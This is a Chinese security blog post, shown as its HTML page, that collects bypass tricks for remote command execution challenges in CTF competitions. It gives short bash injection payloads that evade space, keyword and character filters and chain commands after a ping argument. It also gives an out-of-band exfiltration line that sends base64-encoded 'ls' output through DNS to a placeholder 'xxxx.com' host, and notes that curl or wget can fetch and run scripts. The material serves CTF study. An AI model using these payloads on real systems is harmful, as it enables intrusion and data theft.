<!DOCTYPE html>
<html lang="zh-Hans">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: light)">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: dark)"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/favicon/apple-touch-icon.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/favicon/web-app-manifest-192x192.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/favicon/favicon-96x96.png">
  <link rel="mask-icon" href="/favicon/favicon.svg" color="#222">
  <link rel="manifest" href="/favicon/manifest.json">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/7.0.0/css/all.min.css" integrity="sha256-VHqXKFhhMxcpubYf9xiWdCiojEbY9NexQ4jh8AxbvcM=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"www.leommxj.com","root":"/","images":"/images","scheme":"Mist","darkmode":true,"version":"8.24.1","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"codeblock":{"theme":{"light":"default","dark":"stackoverflow-dark"},"prism":{"light":"prism","dark":"prism-dark"},"copy_button":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"language":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"}}</script><script src="/js/config.js" defer></script>

    <meta name="description" content="最近在几个ctf比赛中遇到好几次远程命令执行绕过的题，网上资料比较零散，做一下整理。">
<meta property="og:type" content="article">
<meta property="og:title" content="RCE Bypass 远程命令执行绕过技巧">
<meta property="og:url" content="http://www.leommxj.com/2017/06/11/RCE-Bypass/index.html">
<meta property="og:site_name" content="Stop Here">
<meta property="og:description" content="最近在几个ctf比赛中遇到好几次远程命令执行绕过的题，网上资料比较零散，做一下整理。">
<meta property="og:locale">
<meta property="article:published_time" content="2017-06-11T06:57:24.000Z">
<meta property="article:modified_time" content="2025-08-24T09:09:39.619Z">
<meta property="article:author" content="leommxj">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="Sec">
<meta name="twitter:card" content="summary">


<link rel="canonical" href="http://www.leommxj.com/2017/06/11/RCE-Bypass/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-Hans","comments":true,"permalink":"http://www.leommxj.com/2017/06/11/RCE-Bypass/","path":"2017/06/11/RCE-Bypass/","title":"RCE Bypass 远程命令执行绕过技巧"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>RCE Bypass 远程命令执行绕过技巧 | Stop Here</title>
  








  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/motion.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script>

  






  





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Stop Here</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">And FxxkOff</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="Search" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Bypass"><span class="nav-number">1.</span> <span class="nav-text">Bypass</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%BF%87%E6%BB%A4%E4%BA%86%E7%A9%BA%E6%A0%BC"><span class="nav-number">1.1.</span> <span class="nav-text">过滤了空格</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%BF%87%E6%BB%A4%E5%91%BD%E4%BB%A4%E6%88%96%E7%89%B9%E6%AE%8A%E5%AD%97%E7%AC%A6"><span class="nav-number">1.2.</span> <span class="nav-text">过滤命令或特殊字符</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%9C%80%E8%A6%81%E5%A4%9A%E6%9D%A1%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C"><span class="nav-number">1.3.</span> <span class="nav-text">需要多条命令执行</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%99%90%E5%88%B6%E5%9B%9E%E6%98%BE"><span class="nav-number">1.4.</span> <span class="nav-text">限制回显</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%9B%9E%E6%98%BE%E4%B8%AD%E6%9C%89%E9%99%90%E5%88%B6"><span class="nav-number">1.4.1.</span> <span class="nav-text">回显中有限制</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%97%A0%E5%9B%9E%E6%98%BE"><span class="nav-number">1.4.2.</span> <span class="nav-text">无回显</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%9B%B4%E6%8E%A5%E4%B8%8B%E8%BD%BD%E6%89%A7%E8%A1%8C"><span class="nav-number">1.5.</span> <span class="nav-text">直接下载执行</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">leommxj</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">9</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">13</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <a href="https://github.com/leommxj" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;leommxj" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-Hans">
    <link itemprop="mainEntityOfPage" href="http://www.leommxj.com/2017/06/11/RCE-Bypass/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="leommxj">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Stop Here">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="RCE Bypass 远程命令执行绕过技巧 | Stop Here">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          RCE Bypass 远程命令执行绕过技巧
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2017-06-11 14:57:24" itemprop="dateCreated datePublished" datetime="2017-06-11T14:57:24+08:00">2017-06-11</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">Edited on</span>
      <time title="Modified: 2025-08-24 17:09:39" itemprop="dateModified" datetime="2025-08-24T17:09:39+08:00">2025-08-24</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">In</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/Sec/" itemprop="url" rel="index"><span itemprop="name">Sec</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><p>最近在几个ctf比赛中遇到好几次远程命令执行绕过的题，网上资料比较零散，做一下整理。</p>
<span id="more"></span>

<h1 id="Bypass"><a href="#Bypass" class="headerlink" title="Bypass"></a>Bypass</h1><p>ctf中RCE的绕过主要是靠linux中bash命令的一些特性和用法，下面从几种不同的过滤情况说明.</p>
<h2 id="过滤了空格"><a href="#过滤了空格" class="headerlink" title="过滤了空格"></a>过滤了空格</h2><p>过滤空格的情况可以通过利用重定向符、IFS、其他字符代替、{,}等方法进行绕过</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cat</span>&lt;&gt;test.txt //重定向符</span><br><span class="line"><span class="built_in">cat</span><span class="variable">$&#123;IFS&#125;</span>text.txt //IFS</span><br><span class="line"><span class="built_in">cat</span>%09test.txt //其他字符代替</span><br><span class="line">&#123;<span class="built_in">cat</span>,test.txt&#125; //&#123;,&#125;</span><br></pre></td></tr></table></figure>
<p>实际情况可能会比较复杂，比如过滤了空格和花括号，那样逗号和IFS的方法就不可行。或者过滤了逗号和重定向符，就利用IFS和%09。灵活运用。</p>
<h2 id="过滤命令或特殊字符"><a href="#过滤命令或特殊字符" class="headerlink" title="过滤命令或特殊字符"></a>过滤命令或特殊字符</h2><p>如果过滤了某个命令，可以利用命令拼接、插入空字符串或者反单引号来绕过</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">//假设过滤了<span class="built_in">ls</span></span><br><span class="line"></span><br><span class="line">a=l;b=s;$a<span class="variable">$b</span> //拼接</span><br><span class="line"></span><br><span class="line">l<span class="string">&#x27;&#x27;</span>s //插入空字符串</span><br><span class="line">l<span class="string">&quot;&quot;</span>s //也是插入空字符串</span><br><span class="line"></span><br><span class="line">l``s //反单引号</span><br></pre></td></tr></table></figure>
<p>这个也有很多灵活的变种，比如第一种拼接方法，如果过滤了分号，可以利用<code>%0a</code>及类似的字符来代替分号。</p>
<p><code>a=l%0ab=s%0a$a$b</code></p>
<p>有时候会遇到过滤文件名内容的，可以通过正则来绕过。比如flag在flag.php中但是句点被过滤了，可以构造<br><code>cat fla*</code><br>这种形式来绕过。</p>
<h2 id="需要多条命令执行"><a href="#需要多条命令执行" class="headerlink" title="需要多条命令执行"></a>需要多条命令执行</h2><p>常见于命令执行的可控位置在某个命令之后，比如<code>ping x.x.x.x</code>这个x.x.x.x可控。我们可以通过使用管道、逻辑运算符、分号以及刚才提过的%0a编码的回车来绕过</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">ping x.x.x.x|<span class="built_in">ls</span> //管道</span><br><span class="line">ping x.x.x.x;<span class="built_in">ls</span> //分号</span><br><span class="line"></span><br><span class="line">ping x.x.x.x&amp;&amp;<span class="built_in">ls</span> //第一个命令执行返回值正常，第二个命令才执行</span><br><span class="line">ping x.x.x.x||<span class="built_in">ls</span> //如果第一个命令执行返回值正常，第二个命令就不执行了</span><br></pre></td></tr></table></figure>

<h2 id="限制回显"><a href="#限制回显" class="headerlink" title="限制回显"></a>限制回显</h2><h3 id="回显中有限制"><a href="#回显中有限制" class="headerlink" title="回显中有限制"></a>回显中有限制</h3><p>某些特殊字符在输出的时候检测到了就会不回显,比如换行符。这种情况可以通过base64或者16进制等编码绕过。<br><code>ls|base64</code></p>
<h3 id="无回显"><a href="#无回显" class="headerlink" title="无回显"></a>无回显</h3><p>无回显可以通过curl、ping、wget等命令与Cloudeye、eye.io等结合或者发起dns查询或者http请求来获取内容。<br>比如</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ping `ls|base64`.xxxx.com</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="直接下载执行"><a href="#直接下载执行" class="headerlink" title="直接下载执行"></a>直接下载执行</h2><p>有时候过滤了某些字符，但是可以直接curl或者wget到脚本执行。<br>这种如果过滤了句点可以尝试将ip转换成十六进制格式，但是需要放行<code>http://</code></p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/CTF/" rel="tag"># CTF</a>
              <a href="/tags/Sec/" rel="tag"># Sec</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2017/02/08/AlexCTF-Writeup/" rel="prev" title="AlexCTF-Writeup">
                  <i class="fa fa-angle-left"></i> AlexCTF-Writeup
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2017/10/02/2017XDCTF-Writeup/" rel="next" title="2017XDCTF-Writeup">
                  2017XDCTF-Writeup <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">leommxj</span>
  </div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/mist/" rel="noopener" target="_blank">NexT.Mist</a>
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="Back to top">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>

</body>
</html>
